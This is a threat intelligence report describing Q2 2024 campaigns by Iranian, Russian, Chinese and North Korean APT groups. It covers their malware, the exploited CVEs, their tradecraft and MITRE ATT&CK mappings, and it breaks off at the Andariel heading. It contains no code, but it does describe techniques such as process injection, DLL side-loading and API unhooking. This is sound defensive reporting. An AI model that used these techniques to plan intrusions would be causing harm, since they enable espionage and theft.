EXECUTIVE SUMMARY
In the second quarter of 2024, Advanced Persistent Threat (APT) groups from China, North Korea, Iran, and Russia demonstrated a surge in dynamic and innovative cyber activities, significantly challenging the global cybersecurity landscape.
Starting with Iran, state-sponsored threat actors exhibited advanced capabilities across various regions and sectors. Void Manticore (Storm-842) targeted Israeli organizations and Albania with destructive attacks and data theft, using custom wipers and web shells. MuddyWater focused on the Middle East, employing spear-phishing and remote monitoring tools to infiltrate the aviation and energy sectors. APT42 (Mint Sandstorm) impersonated journalists to gather intelligence in the US, Europe, and the Middle East, using custom backdoors like TAMECAT and NICECURL, underscoring the persistent and evolving threat from Iranian cyber actors.
Russian threat actors also demonstrated advanced cyber-espionage capabilities. APT28 (Forest Blizzard) targeted Polish government institutions with spear-phishing and DLL side-loading, exploiting CVE-2022-38028. Sandworm (APT44) used the Kapeka backdoor in attacks on Eastern Europe, focusing on ransomware and credential theft. FIN7 (Carbon Spider) expanded its focus from retail and hospitality to defense, insurance, and transportation sectors, deploying the Anunak backdoor via spear-phishing. These activities highlight the sophisticated threats from Russian APT groups, necessitating heightened security measures.
Meanwhile, Chinese state-sponsored threat actors exhibited notable cyber-espionage capabilities. RedJuliett targeted Taiwan and expanded operations to Hong Kong, South Korea, and the US, exploiting network device vulnerabilities to gather intelligence. APT41 (WICKED PANDA) continued its espionage with the resilient KEYPLUG malware on both Windows and Linux platforms. Earth Freybug, a subset of APT41, used DLL hijacking and API unhooking with the UNAPIMON malware to evade detection and conduct sophisticated reconnaissance, emphasizing the persistent and advanced threats from Chinese cyber groups.
Lastly, North Korean cyber threat actors intensified their espionage efforts. Kimsuky (Springtail) targeted South Korea with the new Gomir backdoor and sophisticated social engineering attacks, including the ReconShark malware via Facebook and the TRANSLATEXT Chrome extension. Moonstone Sleet (Storm-1789) engaged in financial and cyber espionage using fake companies, custom ransomware, and trojanized tools. The Lazarus Group used fake job lures to deliver the Kaolin RAT and exploited vulnerabilities for security bypasses. Andariel targeted Korean corporations with advanced RAT malware like Nestdoor and Dora RAT, highlighting North Korea’s persistent and evolving cyber capabilities.
This report provides a comprehensive analysis of the dynamic APT activities observed in Q2 2024, emphasizing the need for ongoing vigilance, user education, and prompt software updates in the ever-evolving cybersecurity landscape.
KEY TRENDS OBSERVED IN Q2 2024
- Iranian APT activities were driven by the motive to advance Iran’s intelligence objectives, particularly those aligned with the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO), by gathering valuable intelligence and influencing decision-making processes to further Iran’s strategic interests in the region.
- Alongside APT28, other threat actors like APT29, MISSION2025, and Stone Panda have also targeted CVE-2022-38028.
- There is a noticeable trend towards the diversification of attack techniques among North Korean APT groups. They are employing sophisticated methods, such as social engineering through platforms like Facebook and leveraging vulnerabilities in widely used applications and protocols.
- Chinese APT groups are exploiting vulnerabilities in firewalls, VPNs, and load balancers globally to initiate attacks. This strategic approach demonstrates their intent to target a wide range of organizations regardless of geographical boundaries, emphasizing a broad-spectrum targeting strategy.
- Chinese threat actors are continuously advancing their tactics, blending sophisticated multi-stage attacks with innovative evasion techniques. Additionally, there’s a notable trend towards developing new, sophisticated malware strains. This dual approach underscores their agility and adaptability in circumventing defenses and maintaining persistence in compromised networks.
IRANIAN APT ACTIVITIES
Targeted Country
- Israel
- Albania
- Turkey
- Azerbaijan
- Jordan
- Saudi Arabia
- United States
- Europe
- Middle East
Targeted Technology
- Windows operating system
- PowerShell
- Microsoft SharePoint
- ScreenConnect
- Atera
- MeshCentral
- Remote Monitoring and Management (RMM) tools
Targeted Industries
- Government
- Finance
- Critical Infrastructure
- NGOs
- Media outlets
- Academia
- Legal services
- Activist groups
- Aviation
- Communications
- Energy
Void Manticore and Scarred Manticore
Void Manticore (aka Storm-842) is an Iranian state-sponsored threat actor notorious for conducting destructive attacks on Israeli organizations and leaking information through the online persona ‘Karma’ (sometimes written as KarMa). Their operations target sectors, such as government, finance, and critical infrastructure, aligning with Iran’s broader offensive strategy. Using straightforward and efficient techniques aimed at causing rapid and significant damage, they extend their attacks beyond Israel to countries like Albania, where they adopt the persona ‘Homeland Justice’ to leak stolen data. In Israel, Void Manticore is notable for using a custom wiper named BiBi, named after Israeli Prime Minister Benjamin Netanyahu. They often gain access to target systems via internet-facing web servers like CVE-2019-0604, deploying web shells, such as the custom “Karma Shell,” which can perform various malicious tasks while being disguised as an error page.
Additionally, they have been seen uploading a custom executable, do.exe, which checks for Domain Admin credentials and installs another web shell, reGeorge, suggesting possible initial access facilitation by another entity (possibly Scarred Manticore, a more sophisticated threat actor). Once inside, Void Manticore uses Remote Desktop Protocol (RDP) for lateral movement and SysInternal’s AD Explorer for network information gathering, establishing command and control (C2) channels using an OpenSSH client. This allows them to control the network environment and prepare for deploying destructive payloads, often using custom wipers that either corrupt specific files or destroy the system’s partition table. Notably, the CI Wiper employs a legitimate driver, ElRawDisk, to wipe files, disks, and partitions, a method seen in other Iran-associated wipers. The collaboration between Void Manticore and Scarred Manticore highlights a sophisticated coordination, enhancing Void Manticore’s effectiveness and reach through advanced capabilities and high-value target access, with their attacks often carrying politically charged messages, as demonstrated by the BiBi wiper.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques |
| Execution | T1059 | Command and Scripting Interpreter |
| Execution | T1059.003 | Windows Command Shell |
| Execution | T1129 | Shared Modules |
| Defense Evasion | T1202 | Indirect Command Execution |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1036 | Masquerading |
| Defense Evasion | T1070 | Indicator Removal |
| Defense Evasion | T1070.001 | Clear Windows Event Logs |
| Defense Evasion | T1070.004 | File Deletion |
| Defense Evasion | T1497 | Virtualization/Sandbox Evasion |
| Defense Evasion | T1564 | Hide Artifacts |
| Defense Evasion | T1564.003 | Hidden Window |
| Credential Access | T1003 | OS Credential Dumping |
| Credential Access | T1539 | Steal Web Session Cookie |
| Discovery | T1010 | Application Window Discovery |
| Discovery | T1057 | Process Discovery |
| Discovery | T1082 | System Information Discovery |
| Discovery | T1083 | File and Directory Discovery |
| Discovery | T1518.001 | Software Discovery: Security Software Discovery |
| Collection | T1005 | Data from Local System |
| Command and Control | T1071 | Application Layer Protocol |
| Command and Control | T1071.001 | Web Protocols |
| Impact | T1485 | Data Destruction |
| Impact | T1490 | Inhibit System Recovery |
MUDDYWATER
Iran’s MuddyWater APT group has been actively targeting Turkey, Azerbaijan, Jordan, Saudi Arabia, and Israel across diverse economic sectors. Operating under the Iranian Ministry of Intelligence and Security (MOIS) since 2017, MuddyWater has focused extensively on the Middle East, particularly within Israel, using sophisticated Computer Network Exploitation (CNE) tactics. Their methods include employing social engineering techniques, like spear-phishing and exploiting known vulnerabilities to infiltrate networks in sectors such as aviation, academia, communications, government, and energy. The group often utilizes legitimate Remote Monitoring and Management (RMM) tools such as ScreenConnect, Atera, MeshCentral, and Advanced Monitoring Tool. In recently observed campaigns, MuddyWater initiates attacks through phishing emails from various legitimate domains controlled by the attacker. These emails contain links to download compressed files, which disguise malicious or seemingly benign RMM tools. Once activated, these tools enable the attacker to remotely control compromised systems, facilitating activities like file transfers, input device manipulation, and screen capturing. Additionally, the group deploys a C/C++-based tool to inject shellcode into targeted processes like msedge.exe, opera.exe, and powershell.exe, using WinAPI functions, such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread to execute their malicious payloads.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques |
| Initial Access | T1566.002 | Phishing: Spearphishing Link |
| Execution | T1203 | Exploitation for Client Execution |
| Privilege Escalation | T1548 | Abuse Elevation Control Mechanism |
| Defense Evasion | T1036 | Masquerading |
| Defense Evasion | T1548 | Abuse Elevation Control Mechanism |
| Defense Evasion | T1562 | Impair Defenses |
| Defense Evasion | T1562.001 | Disable or Modify Tools |
| Defense Evasion | T1564 | Hide Artifacts |
| Defense Evasion | T1564.003 | Hidden Window |
| Credential Access | T1003 | OS Credential Dumping |
| Credential Access | T1552 | Unsecured Credentials |
| Credential Access | T1552.001 | Credentials In Files |
| Credential Access | T1555 | Credentials from Password Stores |
| Credential Access | T1555.003 | Credentials from Web Browsers |
| Discovery | T1012 | Query Registry |
| Discovery | T1057 | Process Discovery |
| Discovery | T1082 | System Information Discovery |
| Collection | T1005 | Data from Local System |
| Command and Control | T1071 | Application Layer Protocol |
| Command and Control | T1573 | Encrypted Channel |
| Impact | T1485 | Data Destruction |
APT42, MINT SANDSTORM
APT42, a notorious cyber espionage group linked to the Iranian state and operating under the alias Mint Sandstorm, has been orchestrating a highly sophisticated social engineering campaign by impersonating journalists to infiltrate networks and gather intelligence, particularly targeting high-profile experts in Middle Eastern affairs. Their operations span strategic regions, including the United States, Israel, Europe, and the Middle East, targeting a diverse range of industries such as NGOs, media outlets, academia, legal services, and activist groups. The attack’s initial phase involves crafting credible journalist personas to establish trust with targets, which is then exploited to gain unauthorized network access. APT42 employs custom backdoors like TAMECAT, a PowerShell toehold for executing arbitrary commands, and NICECURL, a VBScript backdoor for downloading and executing additional modules for data mining and command execution. Their activities are driven by the motive to advance Iran’s intelligence objectives, particularly those aligned with the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO), by gathering valuable intelligence and influencing decision-making processes to further Iran’s strategic interests in the region.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques |
| Execution | T1203 | Exploitation for Client Execution |
| Defense Evasion | T1036 | Masquerading |
| Defense Evasion | T1564 | Hide Artifacts |
| Defense Evasion | T1564.003 | Hidden Window |
| Credential Access | T1003 | OS Credential Dumping |
| Credential Access | T1552 | Unsecured Credentials |
| Credential Access | T1552.001 | Credentials In Files |
| Credential Access | T1555 | Credentials from Password Stores |
| Credential Access | T1555.003 | Credentials from Web Browsers |
| Discovery | T1012 | Query Registry |
| Discovery | T1082 | System Information Discovery |
| Collection | T1005 | Data from Local System |
| Command and Control | T1071 | Application Layer Protocol |
| Command and Control | T1573 | Encrypted Channel |
| Impact | T1485 | Data Destruction |
RUSSIAN APT ACTIVITIES
Targeted Country
- United States
- Europe
- Poland
- Estonia
- Ukraine
Targeted Technology
- Windows Print Spooler service
- Windows
Targeted Industries
- Government
- Automotive Manufacturer
APT28
Forest Blizzard, also known as STRONTIUM (APT28), a Russian-based threat actor, focuses on strategic intelligence gathering to support Russian government foreign policy initiatives. Forest Blizzard employs GooseEgg, a custom post-compromise tool, to gain elevated access to target systems, steal credentials, and facilitate malicious activities, such as remote code execution, installing backdoors, and lateral movement within compromised networks.
The group exploits CVE-2022-38028 (CVSS – 7.8) in the Windows Print Spooler service, using GooseEgg to modify a JavaScript constraints file and execute commands with SYSTEM-level permissions, enabling the launch of arbitrary executables or DLLs with elevated privileges. They manipulate registry keys, create custom protocol handlers, and hijack symbolic links to redirect system processes and execute malicious code. Historically, Forest Blizzard has targeted government, energy, transportation,
NGOs, media, IT, sports organizations, and educational institutions primarily in the United States and Europe. Their activities pose significant risks, including data breaches, credential theft, unauthorized access, and the compromise of sensitive information. The actor’s operations can disrupt functions, compromise network integrity, and facilitate espionage aligned with Russian government interests. Organizations are urged to apply security updates and implement defensive measures to mitigate the threat posed by Forest Blizzard. Alongside APT28, other threat actors like APT29, MISSION2025, and Stone Panda have also targeted CVE-2022-38028. The Cybersecurity and Infrastructure Security Agency (CISA) has added this vulnerability to its list of known vulnerabilities, emphasizing the importance of heightened vigilance and collaboration in defending against sophisticated cyber threats.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques |
| Execution | T1059 | Command and Scripting Interpreter |
| Execution | T1129 | Shared Modules |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1112 | Modify Registry |
| Discovery | T1033 | System Owner/User Discovery |
| Discovery | T1082 | System Information Discovery |
| Discovery | T1083 | File and Directory Discovery |
| Discovery | T1087 | Account Discovery |
| Command and Control | T1071 | Application Layer Protocol |
Another sophisticated cyber-espionage campaign attributed to APT28 and linked to the Russian GRU has been actively targeting Polish government institutions. This campaign employs techniques such as DLL side-loading and executing scripts that download and execute additional payloads, showcasing a high level of technical proficiency and a diverse range of techniques and objectives. APT28’s operations are marked by the use of meticulously crafted spear-phishing emails, which appear legitimate and are personalized for their targets within government agencies. These emails often contain malicious links leading to websites like run[.]mocky[.]io and webhook[.]site, serving as initial entry points for malware delivery. Once the victims click on these links, they inadvertently download a ZIP archive containing malware, disguised as image files, including a Windows Calculator binary masquerading as a JPG image file, along with hidden batch script and DLL files. APT28 utilizes DLL side-loading to load a malicious DLL file while executing a legitimate application, evading detection by security software and allowing it to execute malicious code surreptitiously, thereby compromising the victim’s system. They demonstrate a keen understanding of network evasion tactics, leveraging widely used services like run.mocky.io and webhook[.]site to obscure their activities and reduce the likelihood of detection. Additionally, APT28 employs a multi-stage attack approach with social engineering tactics to maintain the illusion of legitimacy and deceive victims.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques |
| Execution | T1059 | Command and Scripting Interpreter |
| Defense Evasion | T1036 | Masquerading |
| Defense Evasion | T1202 | Indirect Command Execution |
| Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools |
| Defense Evasion | T1564 | Hide Artifacts |
| Defense Evasion | T1564.001 | Hidden Files and Directories |
| Defense Evasion | T1564.003 | Hidden Window |
| Defense Evasion | T1070 | Indicator Removal |
| Credential Access | T1056 | Input Capture |
| Credential Access | T1539 | Steal Web Session Cookie |
| Discovery | T1082 | System Information Discovery |
| Discovery | T1497 | Virtualization/Sandbox Evasion |
| Collection | T1056 | Input Capture |
| Command and Control | T1071 | Application Layer Protocol |
APT44
A previously undocumented backdoor called Kapeka has been sporadically observed in cyber-attacks targeting Eastern Europe, including Estonia and Ukraine, since mid-2022. Researchers have attributed this malware to the Russia-linked APT group Sandworm (aka APT44 or Seashell Blizzard), with Microsoft tracking it under the name KnuckleTouch. Kapeka is a flexible backdoor that functions as an early-stage toolkit for its operators and provides long-term access to the victim’s systems. It features a dropper designed to launch and execute the backdoor component on the infected host, then remove itself. The dropper sets up persistence for the backdoor, either as a scheduled task or autorun registry, depending on whether the process has SYSTEM privileges. Microsoft noted that Kapeka is involved in multiple campaigns distributing ransomware and can steal credentials and data, conduct destructive attacks, and grant remote access to the device. The backdoor, a Windows DLL written in C++, includes an embedded command-and-control (C2) configuration to establish contact with an actor-controlled server and manage polling frequency for retrieving commands. Masquerading as a Microsoft Word add-in, the backdoor gathers information about the compromised host and uses multi-threading to process instructions and exfiltrate results to the C2 server. It communicates with its C2 using JSON to send and receive information and can update its C2 configuration on the fly. Key features of the backdoor include reading and writing files, launching payloads, executing shell commands, and upgrading or uninstalling itself.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques |
| Execution | T1059 | Command and Scripting Interpreter |
| Execution | T1129 | Shared Modules |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1027.005 | Indicator Removal from Tools |
| Defense Evasion | T1112 | Modify Registry |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
| Defense Evasion | T1218.011 | System Binary Proxy Execution: Rundll32 |
| Defense Evasion | T1222 | File and Directory Permissions Modification |
| Defense Evasion | T1497 | Virtualization/Sandbox Evasion |
| Discovery | T1012 | Query Registry |
| Discovery | T1033 | System Owner/User Discovery |
| Discovery | T1057 | Process Discovery |
| Discovery | T1082 | System Information Discovery |
| Discovery | T1083 | File and Directory Discovery |
| Discovery | T1087 | Account Discovery |
| Discovery | T1518 | Software Discovery |
| Discovery | T1518.001 | Security Software Discovery |
| Discovery | T1614 | System Location Discovery |
| Collection | T1560 | Archive Collected Data |
| Command and Control | T1071 | Application Layer Protocol |
| Command and Control | T1573 | Encrypted Channel |
FIN7
FIN7, a Russian advanced persistent threat (APT) group also known as Carbon Spider, ELBRUS, and Sangria Tempest, recently conducted a spear-phishing campaign targeting a US automotive manufacturer. The attackers focused on IT employees with high admin-level rights, luring them with a malicious URL disguised as an IP scanning tool. Upon clicking the link, the Anunak backdoor was deployed, enabling FIN7 to gain an initial foothold using living-off-the-land binaries, scripts, and libraries (lolbas). Historically, FIN7 has targeted the US retail, hospitality, and restaurant sectors, but it is now expanding its focus to the defense, insurance, and transportation sectors. Researchers suggest that FIN7 is likely targeting larger entities, anticipating higher ransom payments.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques |
| Initial Access | T1566.002 | Phishing: Spearphishing Link |
| Execution | T1204.002 | User Execution: Malicious File |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
| Execution | T1569.002 | System Services: Service Execution |
| Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task |
| Persistence | T1543.003 | Create or Modify System Process: Windows Service |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1564.001 | Hide Artifacts: Hidden Files and Directories |
| Defense Evasion | T1222.001 | File and Directory Permissions Modification: Windows File and Directory Permissions Modification |
| Defense Evasion | T1562.004 | Impair Defenses: Disable or Modify System Firewall |
| Discovery | T1124 | System Time Discovery |
| Discovery | T1057 | Process Discovery |
| Discovery | T1087.002 | Account Discovery: Domain Account |
| Discovery | T1069.002 | Permission Groups Discovery: Domain Groups |
| Discovery | T1082 | System Information Discovery |
| Discovery | T1033 | System Owner/User Discovery |
| Lateral Movement | T1021.004 | Remote Services: SSH |
| Command-and-Control | T1571 | Non-Standard Port |
| Command-and-Control | T1090 | Proxy |
| Resource Development | T1608.005 | Stage Capabilities: Link Target |
| Resource Development | T1583.001 | Acquire Infrastructure: Domains |
CHINESE APT ACTIVITIES
Targeted Country
- Taiwan
- Hong Kong
- South Korea
- Laos
- United States
- Rwanda
- Kenya
- Djibouti
- Italy
Targeted Industries
- Aerospace
- Education
- Semiconductor
- Manufacturing
- Technology
- Government
Targeted Technology
- Windows
- Linux
REDJULIETT
In Q2 2024, researchers reported that between November 2023 and April 2024, a likely Chinese state-sponsored group, known as RedJuliett exploited known vulnerabilities in network edge devices, such as firewalls, VPNs, and load balancers for initial access. Operating from Fuzhou, China, RedJuliett persistently targeted Taiwan, likely to support Beijing’s intelligence collection on Taiwan’s economic and diplomatic relations, as well as critical technology development. The group expanded its operations to compromise organizations in Hong Kong, Malaysia, Laos, South Korea, the United States, Djibouti, Kenya, and Rwanda. RedJuliett used SQL injection and directory traversal exploits against web and SQL applications, in addition to targeting internet-facing device vulnerabilities. The group created a SoftEther VPN bridge or client in victim networks and conducted reconnaissance and exploitation using web application security scanners, leveraging open-source web shells and exploiting an elevation of privilege vulnerability in Linux. RedJuliett’s infrastructure includes both threat actor-controlled leased servers and compromised infrastructure belonging to Taiwanese universities. The group’s activities align with Beijing’s objectives to gather intelligence on Taiwan’s economic policy, trade, and diplomatic relations, and they have also targeted multiple critical technology companies, emphasizing the strategic importance of this sector for Chinese state-sponsored threat actors.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques/ Sub Techniques |
| Resource Development | T1583.003 | Acquire Infrastructure: Virtual Private Server |
| Resource Development | T1584 | Compromise Infrastructure |
| Reconnaissance | T1595.002 | Active Scanning: Vulnerability Scanning |
| Initial Access | T1190 | Exploit Public-Facing Application |
| Persistence | T1133 | External Remote Services |
| Persistence | T1505.003 | Server Software Component: Web Shell |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation |
APT41
APT41, also known as WICKED PANDA, is a highly sophisticated Chinese-backed cyber threat group renowned for its extensive cyber espionage and cybercrime operations. Their latest campaign involves the deployment of the KEYPLUG malware, a modular backdoor written in C++ and active since at least June 2021, with variants for both Windows and Linux platforms. KEYPLUG employs advanced techniques for command and control (C2) communication, including HTTP, TCP, KCP over UDP, and WSS. The malware exhibits high resilience and stealth, remaining undetected in environments with advanced detection solutions. The Windows variant involves a .NET loader that decrypts and executes shellcode, leading to the final payload, while the Linux variant demonstrates even greater complexity. Both variants utilize custom algorithms for API hashing and employ techniques to evade security measures, highlighting the advanced capabilities and persistent threat posed by APT41.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques/Sub-Techniques |
| Initial Access | T1566 | Phishing |
| Execution | T1047 | Windows Management Instrumentation |
| Defense Evasion | T1070.006 | Indicator Removal: Timestomp |
| T1497.001 | Virtualization/Sandbox Evasion: System Checks |
|
| Credential Access | T1056.004 | Input Capture: Credential API Hooking |
| Discovery | T1010 | Application Window Discovery |
| Discovery | T1057 | Process Discovery |
| Discovery | T1082 | System Information Discovery |
| Discovery | T1497 | Virtualization/Sandbox Evasion |
| Discovery | T1518.001 | Software Discovery: Security Software Discovery |
| Collection | T1056.004 | Input Capture: Credential API Hooking |
| Command and Control | T1071 | Application Layer Protocol |
EARTH FREYBUG
At the beginning of Q2 2024, researchers observed Earth Freybug; a subset of APT41, leveraging DLL hijacking and API unhooking to evade detection, using a newly discovered malware, UNAPIMON. This malware employs defense evasion techniques to prevent child processes from being monitored. The attack chain begins with a legitimate process, vmtoolsd.exe, being hijacked to execute a scheduled task that runs a reconnaissance batch file. This file gathers system information and sets up another task to deploy a backdoor through DLL side-loading using the SessionEnv service. UNAPIMON, a DLL malware, hooks the CreateProcessW function, creates a suspended process, and verifies DLL integrity before unhooking critical APIs in the child process. This allows malicious activities to proceed undetected. The attack highlights Earth Freybug’s evolving tactics and the effectiveness of simple yet innovative techniques in sophisticated cyber espionage campaigns.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques/Sub Techniques |
| Execution | T1053 | Scheduled Task/Job |
| Persistence | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools |
| Discovery | T1082 | System Information Discovery |
ADDITIONAL OBSERVATIONS
The Chinese APT group ChamelGang has been deploying ransomware in its cyberespionage campaigns, targeting critical sectors like healthcare and government organizations. In 2022, they attacked significant institutions in India and Brazil, and in 2023, they focused on a government organization in East Asia and an aviation organization in the Indian subcontinent. ChamelGang uses CatB ransomware, obfuscated malware like BeaconLoader, and Cobalt Strike beacons for their operations. They utilize publicly available tools for privilege escalation and proxies for routing malicious traffic. Their tactics include obfuscation, exploitation of remote services, and masquerading malware components to evade detection.
NORTH KOREA APT ACTIVITIES
Targeted Country
- South Korea
- Asia
Targeted Technology
- Software
- Windows
- Linux
- Applications
Targeted Industries
- Government
- Software
- Education
- Manufacturing
- Construction
KIMSUKY
In Q2 2024, researchers identified that the North Korean cyber espionage group, Springtail (also known as Kimsuky), has been deploying a new Linux backdoor called Gomir in their recent campaign against South Korean organizations. This malware has structural similarities with GoBear and extensive code sharing between the two. Springtail has a history of targeting South Korean public sector organizations, employing sophisticated methods like spear-phishing and exploiting improperly configured DNS DMARC policies. In their latest campaign, the group used Trojanized software installation packages to distribute a new malware family named Troll Stealer, capable of stealing files, screenshots, browser data, and system information, including the GPKI folder used by South Korean government personnel. Gomir, upon execution, can install itself persistently by creating a system service or configuring a crontab based on its privilege level. It communicates with its command-and-control server using HTTP POST requests, allowing the execution of various commands such as executing shell commands, collecting system information, and exfiltrating files. This campaign underscores a heavy focus on supply chain attacks, utilizing techniques such as Trojanized software installers and fake software installers to maximize infection rates among their targeted South Korean-based organizations.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques/Sub Techniques |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1027.005 | Obfuscated Files or Information: Indicator Removal from Tools |
| Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
| Discovery | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
| Discovery | T1518.001 | Software Discovery: Security Software Discovery |
| Command and Control | T1071 | Application Layer Protocol |
| Command and Control | T1095 | Non-Application Layer Protocol |
The Kimsuky APT group has recently initiated another sophisticated cyber espionage campaign leveraging Facebook as an initial entry point, posing as human rights officials to target anti-North Korea sectors. Using fake profiles, they engage targets via Facebook Messenger, gradually building trust before sharing malicious OneDrive links disguised as legitimate documents, such as ‘My_Essay(prof).msc’. This Microsoft Common Console Document file, when executed, triggers a concealed malware dubbed ReconShark. This variant exhibits advanced capabilities, including stealthy execution and connection to a command and control (C2) server. The malware’s tactics include persistent file manipulation (‘warm.vbs’) and task scheduling (‘OneDriveUpdate’), aimed at maintaining long-term access and exfiltrating sensitive information. The campaign’s global scope and use of deceptive social engineering underscore its evolving threat landscape.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques |
| Execution | T1059 | Command and Scripting Interpreter |
| Persistence | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Privilege Escalation | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Defense Evasion | T1036 | Masquerading |
| Defense Evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Discovery | T1046 | Network Service Discovery |
| Discovery | T1082 | System Information Discovery |
| Command and Control | T1071 | Application Layer Protocol |
| Command and Control | T1095 | Non-Application Layer Protocol |
Meanwhile, in Q2 2024, researchers discovered new activity from Kimsuky, involving the use of a malicious Google Chrome extension named “TRANSLATEXT” for cyber espionage. This extension, uploaded to an attacker-controlled GitHub repository in March, was designed to steal email addresses, usernames, passwords, and cookies, and capture browser screenshots. TRANSLATEXT bypasses the security measures of prominent email providers like Gmail, Kakao, and Naver. The attack primarily targeted South Korean academics involved in political research related to North Korea. Kimsuky’s tactics included using PowerShell scripts and manipulating the Windows registry to enforce extension installation. The group’s ongoing campaign emphasizes the need for vigilance against such advanced threats.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
| Persistence | T1176 | Browser Extensions |
| Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers |
| Collection | T1113 | Screen Capture |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols |
| Command and Control | T1102.001 | Web Service: Dead Drop Resolver |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
In Q2 2024, researchers found that Kimsuky exploited the MS Office Equation Editor vulnerability (CVE-2017-11882) to distribute a keylogger. The keylogger was delivered via an embedded malicious script executed by mshta.exe, which connected to a URL hosting the script disguised as an error page. The script downloaded additional malware, created a file named desktop.ini.bak to store keylogging and clipboard data, and attempted to register itself in the Windows registry to run at startup. Despite a coding error preventing registry registration, the keylogger collected and sent data to the command-and-control server before deletion and recreation.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques/ Sub Techniques |
| Initial Access | T1190 | Exploit Public-Facing Application |
| Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Credential Access | T1056 | Input Capture |
| Collection | T1005 | Data from Local System |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
MOONSTONE SLEET
At the beginning of Q2 2024, researchers identified a new North Korean threat actor, Moonstone Sleet (also tracked as Storm-1789), which employs both established and unique attack methodologies for financial and cyberespionage objectives. This group sets up fake companies and job opportunities to engage targets, uses trojanized legitimate tools, creates a malicious game, and deploys custom ransomware. Moonstone Sleet, initially overlapping with Diamond Sleet, now operates with its own infrastructure and attack methods. Notable tactics include delivering trojanized PuTTY via social media and freelancing platforms, using malicious npm packages, and creating fake companies like StarGlow Ventures and C.C. Waterfall. The group has developed a malicious tank game, DeTankWar, and a ransomware variant, FakePenny, to target companies. Moonstone Sleet’s operations indicate a well-resourced actor with capabilities inherited from prior North Korean cyber operations, suggesting a strategic alignment with North Korean cyber objectives.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques |
| Execution | T1129 | Shared Modules |
| Persistence | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Privilege Escalation | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Discovery | T1082 | System Information Discovery |
| Discovery | T1083 | File and Directory Discovery |
| Command and Control | T1071 | Application Layer Protocol |
| Impact | T1486 | Data Encrypted for Impact |
LAZARUS
By the beginning of Q2 2024, researchers discovered that the North Korea-linked Lazarus Group used fake job lures to deliver the new Kaolin RAT in attacks on individuals in Asia in the summer of 2023. The Kaolin RAT, which can change file timestamps and load DLL binaries from command-and-control (C2) servers, also serves as a conduit for the FudModule rootkit. This rootkit exploits a patched vulnerability in the appid.sys driver (CVE-2024-21338 with CVSS 7.8) to disable security mechanisms. Lazarus’s Operation Dream Job campaign uses social media and instant messaging platforms to trick targets into launching malicious ISO files containing a renamed Windows application “AmazonVNC.exe” that side-loads “version.dll” and injects a payload from “aws.cfg.” This payload downloads shellcode from a hacked Italian company website, launching RollFling and subsequently RollSling, which loads RollMid. RollMid establishes C2 communication through a three-step process involving HTML files, PNG images with steganography, and Base64-encoded data blobs, ultimately fetching the Kaolin RAT. The malware enumerates files, performs file operations, uploads to C2, alters timestamps, manages processes, executes commands, and connects to hosts. Lazarus’s complex and evolving attack chain demonstrates significant resource investment and innovation, posing a substantial challenge to cybersecurity defenses.
| MITRE ATT&CK Techniques | ||
| Tactics | ID | Techniques |
| Initial Access | T1566 | Phishing |
| Execution | T1059 | Command and Scripting Interpreter |
| Persistence | T1547 | Registry Run Keys / Startup Folder |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1036 | Masquerading |
| Defense Evasion | T1497 | Virtualization/Sandbox Evasion |
| Discovery | T1082 | System Information Discovery |
| Discovery | T1083 | File and Directory Discovery |
| Collection | T1005 | Data from Local System |
| Command and Control | T1071 | Application Layer Protocol |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
ANDARIEL
